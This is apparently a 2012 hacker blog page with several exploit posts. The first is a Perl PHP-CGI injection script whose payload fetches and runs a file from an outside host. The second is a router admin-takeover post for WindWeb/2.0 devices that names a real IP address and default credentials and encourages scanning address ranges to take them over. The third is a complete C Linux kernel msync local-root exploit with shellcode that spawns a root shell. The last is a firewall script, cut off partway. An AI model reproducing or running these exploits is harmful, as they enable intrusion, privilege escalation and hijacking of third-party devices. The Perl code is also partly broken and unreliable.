Help pay for xds lawyer fees.
LR

[Exploit Updated]: PHP CGI – executes a payload wich is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

ALSO this CAN execute cmds ofc, i will addin a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: , , , , , , ,

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

[Exploiting Linux code]: Modified version … yea, abit old BUT working on FC ;) hav fun… thx to sd for this, but, added Tifflib in this… so, have a play…

Posted on 25th April 2012 in Android, Codes, Exploits, Papers, Uncategorized

This code rox as is based on the bugs within fsync/fasync..msync..now, i have changed things to suit MY tests, but.. it is verymuch nice and, well, on RHEL4-5 is still OK … enjoy!

thx to sd , AB and others for the help on this mod..


/* Fedora4 exploit in msync() - still work in progress but it will exploit... */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/fcntl.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <linux/elf.h>

#define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */
#define ltime unsigned long long
#define MEMSZ (70*1024*1024)
#define MAGIC -123
unsigned char shellcode[] =

"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3";

static ltime gtime() {
struct timeval tv;
gettimeofday(&tv, NULL);
return tv.tv_sec * 1000000 + tv.tv_usec;
}

ltime lt;

static void time_start() {
lt = gtime();
}

static void time_end() {
printf("took %lu microseconds\n", gtime() - lt);
}

void core_stat() {
int s;
char buf[512];
char incore;
unsigned long last = 0;
FILE *f;

sprintf(buf, "/proc/%d/maps", getpid());
f = fopen(buf, "rt");
while (fgets(buf, 512, f)) {
unsigned int from, to;
unsigned int i;
if (sscanf(buf, "%x-%x", &from, &to) < 2)
break;
for (i = from; i < to; i += PAGE_SIZE) {
mincore((void *) i, PAGE_SIZE, &incore);
if (incore) {
r:;
if (!last) {
printf("in core 0x%08x-", i);
s = last = i;
continue;
}
if (last + PAGE_SIZE == i) {
last = i;
continue;
}
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
goto r;
}
if (!last)
continue;
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
}
}
fclose(f);
}
#define SWAPFILE "TTswap"
#define EATFILES "TTeatfiles"
#define EATFILE "TTeatfile"
#define SHAREFILE "TTsharefile"
#define DUMMYFILE "TTdummyfile"
#define EATTIME 10
#define LIBFILE "TTlib"

/* number of vma struct fill */
#define VMAFILL 15000
/* how much pages to sync - 2 is enough */
#define NSYNC 2
#define BASE (char *) 0x60000000
#define DBASE (char *) 0x80001000
#define EPAGE (char *) 0x80000000
#define MAPSTEP 64 * 4096
#if 1
#define DEBUG(x...) { printf("%s():", __func__); printf(x); printf("\n"); }
#else
#define DEBUG(x...)
#endif
#define sendsig(pid) kill(pid, SIGUSR1)
#define wait4sig() { while (!gotsig) pause(); gotsig = 0; }
#define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1))
#define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1))

#undef O_DIRECT
#define O_DIRECT 0

struct libimg {
Elf32_Ehdr elf;
Elf32_Phdr ph;
};
struct dentry_struct {
unsigned dummy0, dummy1;
void *inode1, *inode2;
};
struct file_struct {
struct file_struct *next, *prev;
void *dentry;
void *mnt;
void *op;
void *f_mapping[64];
};
struct vma_struct {
void *mm;
unsigned long vm_start;
unsigned long vm_end;
struct vma_struct *vm_next;
unsigned long pgprot;
unsigned long vmflags;
char rb[16];
void *shared_next, *shared_prev;
void *vm_ops;
unsigned long pgoff;
void *file;
void *priv;
};
struct mm_struct {
struct vma_struct *mmap;
void *rb;
struct vma_struct *cache;
void *pgd1;
void *pgd2;
void *pgd3;
unsigned long locks[32];
};
struct libimg limg = {
{
e_ident: "\177ELF",
e_type: ET_EXEC,
e_machine: EM_386,
e_phoff: sizeof(Elf32_Ehdr),
e_ehsize: sizeof(Elf32_Ehdr),
e_phentsize: sizeof(Elf32_Phdr),
e_phnum: 1
},
{
p_type: PT_LOAD,
p_vaddr: 0,
p_memsz: 0
}
};

static void make_lib(char *name) {
int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700);
write(libfd, &limg, sizeof(limg));
fchmod(libfd, 0700);
}
static char thread_stack[16384];
int fd1, fd2, fd3;
char buf[MAPSTEP];
int notincore;
int t4;
int t3;
int t2;
int bigsize = 0;
char *bigmem = NULL;
int swapsize = 0;
char *swapmem = NULL;
char *base = BASE;
char *vmamem;
int gotsig = 0;
int sem = 0;
#define cleanup() _cleanup(__func__, __LINE__)
void killall() {
if (t2 != getpid())
kill(t2, SIGKILL);
if (t3 != getpid())
kill(t3, SIGKILL);
if (t4 != getpid())
kill(t4, SIGKILL);
}

void _cleanup(const char *name, int line) {
printf("cleanup called! from %s:%d\n", name, line);
killall();
unlink(SHAREFILE);
unlink(SWAPFILE);
unlink(EATFILES);
unlink(EATFILE);
unlink(LIBFILE);
_exit(1);
}
#define FAKES_BASE 0x50000000

struct fakes {
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
unsigned long mapping24[128];
unsigned long mapping26[128];
unsigned long inode[128];
unsigned long pgd[1024];
void *ptrs[128];
char shellcode[sizeof(shellcode)];
int t2;
};
struct fakes *fakes = (void *) FAKES_BASE;
void build_fakevma() {
int i;
memset(fakes, 0, sizeof(*fakes));
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;
fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
memset(fakes->pgd, 0, sizeof(fakes->pgd));
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;
fakes->mapping26[0] = (unsigned long) fakes->inode;
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}

void create_fakepage(void *buf) {
int i;
void *vma = &fakes->vma;
void **p = buf;
for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma;
}
static void sighand(int d) {
gotsig = 1;
}

static int thread(void *d) {
int t3;
int ret;
int i;
wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap2 back the evil page\n");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap2(swapmem + PAGE_SIZE * 2, PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE,PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, mapped\n",ret);
printf("(sleep2)\n");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");

setuid(0);

setresgid(0);
execl("/bin/sh", "/bin/sh", "-i", NULL);  // bit better now :P
printf("execve failed %d\n", errno);
}
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
int main(int argc, char *argv[]) {
int i, n;
char *dummy = DBASE;
printf("linux kernel msync race condition\nbug discovered by sd, further research by sd and now xd\nthis is development-in-progress code\n=============================================\n");
signal(SIGUSR1, sighand);
signal(SIGALRM, sighand);
setbuf(stdout, NULL);
i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
mmap2(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC,MAP_SHARED, i,0);
ftruncate(i, PAGE_ALIGN(sizeof(*fakes)));
build_fakevma();
t4 = fork();
if (!t4) {
while (1) {
fakes->t1++;
fakes->t2++;
sched_yield();
}
}
printf("creating page\n");
create_fakepage(buf);
i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(i, MAPSTEP);
write(i, buf, MAPSTEP);
for (n = 0; n < MEMSZ; n += MAPSTEP)
mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0);
fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd3, 16384);
fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777);
alarm(EATTIME);
printf("done fakepage\n");
do {
int c;
c = write(fd1, buf, MAPSTEP);
if (c < MAPSTEP)
break;
bigsize += c;
printf("done %d Kb\r", bigsize / 1024);
} while (!gotsig);
printf("\n");
alarm(0);
gotsig = 0;
bigmem = mmap2(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_SHARED, fd1, 0);  // ye i changed this to mmap2() (xd) ...go figure
if (bigmem == MAP_FAILED)
cleanup();
t3 = fork();
if (!t3) {
wait4sig();
printf("starting aggresive write!\n");
write(fd3, bigmem, bigsize);
printf("done aggresive write!\n");
_exit(0);
}
t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4, 0xf00, NULL);
swapmem = base;
if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE, 0, 0) == MAP_FAILED) cleanup();
printf("creating swapfile\n");
fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd2, MEMSZ);
vmamem = swapmem + MEMSZ + 16*PAGE_SIZE;
printf("vmamem = %p\n", vmamem);
mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_FIXED, fd2, 0);
printf("swapmem = %p, swapsize = %d\n", swapmem, 2*PAGE_SIZE);
write(fd2, dummy, MEMSZ);
close(fd2);
printf("unlink\n");
unlink(SWAPFILE);
build_fakevma();
sendsig(t2);
limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE;
limg.ph.p_memsz = PAGE_SIZE * 2;
make_lib(LIBFILE);
printf("started uselib\n");
time_start();
uselib(LIBFILE);
time_end();
printf("uselib finished!\n");
sem = 1;
printf("pid %d\n",getpid());
n = 0;
n = waitpid(t2, NULL, __WCLONE);
printf("waitpid got %d/%d\n", n, errno);
cleanup();
}

 

enjoy1

xd / freelance coder

comments: 0 » tags: , , , ,

IPTABLES/IP6TABLES KUSTOMISED SETTINGS TO REJECT DoS , BOTH PROTOCOLS! (LINUX)

Posted on 25th April 2012 in Codes, Exploits, Papers, Uncategorized

MY KUSTOM FIREWALL , ENJOY! SINCE MIGRATING TO BSD, I HAVE LET IPTABLES GO F**K ITSELF ABIT BUT HERE ANYHOW.. ENJOY SOME PROTECTION EH.. DONATE TO FUCKING HELP ME PAY MY LAWYER FOR CHRISTS SAKE, I WONT LAST MUCH DAMN LONGER WITHOUT IT! LOL, YES IM A BUM AND BROKE, IM SPONSRED BY MY GOVERNEMNTS SS :p SO FUCKING LIKE WHAT YOUR GETTIN, COZ I DONT REALLY HAVE TO GIVE SHIT, JUST REMMEBER THT.

HERE.


#!/bin/sh
# Loopback interface
LO_IF="lo"
# Network card connected to Internet
NET_IF="eth1"
# DMZ interface, if any
DMZ_IF=""

# iptables executables
IPTABLES="/sbin/iptables"
IP6TABLES="/sbin/ip6tables"

# Set this to 1 if you want enable IPv4 port forwarding
IPV4_FORWARDING=""
# 99% you don't need IPv6 at all, so, disable it
DISALLOW_IPV6="1"

# Ports that you want to be explicitly disabled
PORTS_TO_DISABLE="113"
# TCP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
TCP_PORTS_INCOMING_ALLOW="21 631 6667 7000 2222 80 443"
TCP_PORTS_OUTGOING_ALLOW="21 631 6667 7000 2222 80 443"
# UDP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
UDP_PORTS_INCOMING_ALLOW="53"
UDP_PORTS_OUTGOING_ALLOW="53"
# Block IPs trying to make too many connections on given ports
# If you have Entropy connecting, do not set this!
# Of course timed ports here have to be set in the variables above too.
# It will work for both tcp and udp.
TIMED_PORTS=""
# Number of times ip is allowed to bug port
TIMED_PORTS_HIT_COUNT="5"
# Number of seconds the ban will last and also the amount of time
# within user can at most try to connect TIMED_PORTS_HIT_COUNT times
TIMED_PORTS_TIMER_SECS="300"

# =========================
# PORT SETTINGS ABOVE =====
# =========================

# Allow sane ICMP packets (ping, traceroute) (DoS)
# set this to 1 if you want it, or leave unset
ALLOW_SANE_ICMP="1"
# Completely disable ICMP instead? (DoS)
# set this to 1 if you want it, or leave unset
FUCK_ICMP_I_DONT_NEED_IT=""
# Number of allowed ICMP packets per second (this is a further filter) (DoS)
ICMP_PACKETS_PER_SECOND="1"
# Also rate limit RST Packets, to mitigate SMURF attacks (DoS)
RST_PACKETS_PER_SECOND="2"

# Kill identd?
# set this to 1 if you want it, or leave unset
KILL_IDENTD="1"
# Kill port scanning? If you set this to 1, please also set
# a port to monitor against port scans (I suggest 139, trust me, it's fine for ssh too)
# IP will be blocked for PORT_SCANNING_SECONDS (1 day)
KILL_PORT_SCANNING="1"
PORT_SCANNING_PORT="139"
PORT_SCANNING_SECONDS="86400"
# Enable IP spoofing protection? (DoS)
IP_SPOOFING_PROTECTION="1"
# Enable kernel SYN flood protection? (DoS)
SYN_FLOOD_PROTECTION="1"
# Max SYN backlog on TCP
TCP_MAX_SYN_BACKLOG="1024"
# Set the tcp-time-wait buckets pool size
TCP_MAX_TW_BUCKETS="1440000"
# Ignore ICMP broadcasts anyway? (DoS)
IGNORE_ICMP_BROADCASTS="1"
# Log packets with impossible addresses?
LOG_MARTIAN_IPS="1"
# Disallow ICMP redirects? (DoS)
DISALLOW_ICMP_REDIRECTS="1"
# Disallow source routed packets? (DoS)
DISALLOW_SOURCE_ROUTED_PACKETS="1"
# Disallow multicast routing? (DoS)
#DISALLOW_MULTICAST_ROUTING="1"
# Disallow proxy_arp?
DISALLOW_PROXY_ARP="1"
# Disallow bootp relay?
DISALLOW_BOOTP_RELAY="1"
# Enable secure redirects (only accept ICMP redirects for
# gateways. Helps against MITM attacks.
ENABLE_SECURE_ICMP_REDIRECTS="1"

# Decrease the time default value for tcp_fin_timeout connection
TCP_FIN_TIMEOUT="15"
# Decrease the time default value for tcp_keepalive_time connection
TCP_KEEPALIVE_TIME="1800"
# Handle TCP window scaling, disable by default
DISALLOW_TCP_WINDOW_SCALING=""
# Turn off TCP timestamp feature
TCP_TIMESTAMP="0"

# Drop traffic from IANA-reserved IPs.
DROP_IANA_IPS="1"
# Completely ignore Microsuck ports
IGNORE_MICROSOFT_SHIT="1"

# General default logging rate limit parameters
RLIMIT="-m limit --limit 3/s --limit-burst 8"
# General default logging parameters
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="${LOG} --log-ip-options"

# set this to a valid path containing your custom iptables rules
# it will be sourced
CUSTOM_RULES_FILE_PRE=""
CUSTOM_RULES_FILE_POST=""

####
#### stay away from here.
####

if [ -z "${NET_IF}" ]; then
echo "set NET_IF"
exit 1
fi
if [ ! -x ""${IPTABLES}"" ]; then
echo "set IPTABLES"
exit 1
fi
if [ ! -x ""${IP6TABLES}"" ]; then
echo "set IP6TABLES"
exit 1
fi

# drop everything by default
"${IPTABLES}" -P INPUT DROP
"${IPTABLES}" -P FORWARD DROP
"${IPTABLES}" -P OUTPUT DROP

# Set the nat/mangle/raw tables' chains to ACCEPT
"${IPTABLES}" -t nat -P PREROUTING ACCEPT
"${IPTABLES}" -t nat -P OUTPUT ACCEPT
"${IPTABLES}" -t nat -P POSTROUTING ACCEPT

"${IPTABLES}" -t mangle -P PREROUTING ACCEPT
"${IPTABLES}" -t mangle -P INPUT ACCEPT
"${IPTABLES}" -t mangle -P FORWARD ACCEPT
"${IPTABLES}" -t mangle -P OUTPUT ACCEPT
"${IPTABLES}" -t mangle -P POSTROUTING ACCEPT

# clear previous rules
"${IPTABLES}" -F
"${IPTABLES}" -t nat -F
"${IPTABLES}" -t mangle -F
"${IPTABLES}" -X
"${IPTABLES}" -t nat -X
"${IPTABLES}" -t mangle -X
"${IPTABLES}" -Z
"${IPTABLES}" -t nat -Z
"${IPTABLES}" -t mangle -Z

if [ -n "${DISALLOW_IPV6}" ]; then
"${IP6TABLES}" -P INPUT DROP
"${IP6TABLES}" -P FORWARD DROP
"${IP6TABLES}" -P OUTPUT DROP
# The mangle table can pass everything
"${IP6TABLES}" -t mangle -P PREROUTING ACCEPT
"${IP6TABLES}" -t mangle -P INPUT ACCEPT
"${IP6TABLES}" -t mangle -P FORWARD ACCEPT
"${IP6TABLES}" -t mangle -P OUTPUT ACCEPT
"${IP6TABLES}" -t mangle -P POSTROUTING ACCEPT
# Delete all rules.
"${IP6TABLES}" -F
"${IP6TABLES}" -t mangle -F
# Delete all chains.
"${IP6TABLES}" -X
"${IP6TABLES}" -t mangle -X
# Zero all packets and counters.
"${IP6TABLES}" -Z
"${IP6TABLES}" -t mangle -Z

fi

if [ -f "${CUSTOM_RULES_FILE_PRE}" ]; then
source "${CUSTOM_RULES_FILE_PRE}"
fi

# setup ipv4 forwarding
ip_forward="0"
if [ -n "${IPV4_FORWARDING}" ]; then
ip_forward="1"
fi
echo "Setting ip_forward to ${ip_forward}"
echo ${ip_forward} > /proc/sys/net/ipv4/ip_forward

# ip spoofing protection
ip_spoof="0"
if [ -n "${IP_SPOOFING_PROTECTION}" ]; then
ip_spoof="1"
fi
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo "Setting ip spoofing protection on ${i} to ${ip_spoof}"
echo ${ip_spoof} > ${i}
done

# syn flood attacks
syn_flood="0"
if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
syn_flood="1"
fi
echo "Setting SYN flood protection on to ${syn_flood}"
echo ${syn_flood} > /proc/sys/net/ipv4/tcp_syncookies
echo "Setting tcp_max_syn_backlog to ${TCP_MAX_SYN_BACKLOG}"
echo "${TCP_MAX_SYN_BACKLOG}" > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo "Setting tcp_max_tw_buckets to ${TCP_MAX_TW_BUCKETS}"
echo "${TCP_MAX_TW_BUCKETS}" > /proc/sys/net/ipv4/tcp_max_tw_buckets

log_from_mars="0"
if [ -n "${LOG_MARTIAN_IPS}" ]; then
log_from_mars="1"
fi
for i in /proc/sys/net/ipv4/conf/*/log_martians; do
echo "Setting martian sources logging on ${i} to ${log_from_mars}"
echo ${log_from_mars} > ${i}
done

# don't log invalid responses to broadcast
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

# don't accept or send ICMP redirects.
icmp_redir="1"
if [ -n "${DISALLOW_ICMP_REDIRECTS}" ]; then
icmp_redir="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do
echo "Setting ICMP redirection acceptance on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do
echo "Setting ICMP redirection send on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done

# don't accept source routed packets.
sr_pack="1"
if [ -n "${DISALLOW_SOURCE_ROUTED_PACKETS}" ]; then
sr_pack="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do
echo "Setting routed packed disallowing on ${i} to ${sr_pack}"
echo ${sr_pack} > ${i}
done

if [ -n "${TCP_FIN_TIMEOUT}" ]; then
echo "Setting tcp_fin_timeout to ${TCP_FIN_TIMEOUT}"
echo "${TCP_FIN_TIMEOUT}" > /proc/sys/net/ipv4/tcp_fin_timeout
fi
if [ -n "${TCP_KEEPALIVE_TIME}" ]; then
echo "Setting tcp_keepalive_time to ${TCP_KEEPALIVE_TIME}"
echo "${TCP_KEEPALIVE_TIME}" > /proc/sys/net/ipv4/tcp_keepalive_time
fi
w_scal="1"
if [ -n "${DISALLOW_TCP_WINDOW_SCALING}" ]; then
w_scal="0"
fi
echo "Setting tcp_window_scaling to ${w_scal}"
echo "${w_scal}" > /proc/sys/net/ipv4/tcp_window_scaling

# TCP timestamp
echo "Setting tcp_timestamps to ${TCP_TIMESTAMP}"
echo "${TCP_TIMESTAMP}" > /proc/sys/net/ipv4/tcp_timestamps

# disallow multicast routing
# TODO: doesn't work
#m_rout="1"
#if [ -n "${DISALLOW_MULTICAST_ROUTING}" ]; then
#    m_rout="0"
#fi
#for i in /proc/sys/net/ipv4/conf/*/mc_forwarding; do
#    echo "Setting multicast forwarding on ${i} to ${m_rout}"
#    echo ${m_rout} > ${i}
#done

# disallow proxy_arp
p_arp="1"
if [ -n "${DISALLOW_PROXY_ARP}" ]; then
p_arp="0"
fi
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do
echo "Setting proxy_arp on ${i} to ${p_arp}"
echo ${p_arp} > ${i}
done

bp_rel="1"
if [ -n "${DISALLOW_BOOTP_RELAY}" ]; then
bp_rel="0"
fi
for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do
echo "Setting bootp_relay on ${i} to ${bp_rel}"
echo ${bp_rel} > ${i}
done

s_redir="0"
if [ -n "${ENABLE_SECURE_ICMP_REDIRECTS}" ]; then
s_redir="1"
fi
for i in /proc/sys/net/ipv4/conf/*/secure_redirects; do
echo "Setting secure_redirects on ${i} to ${s_redir}"
echo ${s_redir} > ${i}
done

# enable changes
echo 1 > /proc/sys/net/ipv4/route/flush

# create some custom chains, useful for logging
# LOG packets, then ACCEPT
RLIMIT="-m limit --limit 3/s --limit-burst 8"
"${IPTABLES}" -N ACCEPTLOG
"${IPTABLES}" -A ACCEPTLOG -j ${LOG} ${RLIMIT} --log-prefix "ACCEPT "
"${IPTABLES}" -A ACCEPTLOG -j ACCEPT
# LOG packets, then DROP.
"${IPTABLES}" -N DROPLOG
"${IPTABLES}" -A DROPLOG -j ${LOG} ${RLIMIT} --log-prefix "DROP "
"${IPTABLES}" -A DROPLOG -j DROP
# LOG packets, then REJECT.
# TCP packets are rejected with a TCP reset.
"${IPTABLES}" -N REJECTLOG
"${IPTABLES}" -A REJECTLOG -j ${LOG} ${RLIMIT} --log-prefix "REJECT "
"${IPTABLES}" -A REJECTLOG -p tcp -j REJECT --reject-with tcp-reset
"${IPTABLES}" -A REJECTLOG -j REJECT
echo "Generated chains: ACCEPTLOG, DROPLOG, REJECTLOG"

# setup local communication
"${IPTABLES}" -A INPUT -i ${LO_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${LO_IF} -j ACCEPT

if [ -n "${DMZ_IF}" ]; then
